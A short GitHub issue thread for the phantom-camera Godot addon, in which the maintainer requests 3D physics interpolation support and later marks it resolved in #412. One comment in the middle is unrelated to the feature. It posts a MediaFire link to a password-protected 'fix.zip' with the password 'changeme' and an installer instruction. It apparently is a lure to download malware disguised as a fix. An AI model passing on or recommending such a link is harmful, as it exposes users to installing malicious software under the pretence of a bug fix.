### ISSUE TITLE
3D Physics Interpolation Support

### ISSUE THREAD

**Issue by ramokz** [ramokz/phantom-camera#375]
### Project Type

3D

### Feature Description

Similar to #294, this is meant to provide the same support and user experience results as the 2D variant.

While this change is only for Godot 4.4, the addon should remain compatible with Godot 4.2.

### Use Cases

Is for every user who wants to use a node that inherits from a `PhysicsBody3D` class as a `follow` or `look at` target, so is universally applicable.

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ramokz** [comment]
Resolved in #412
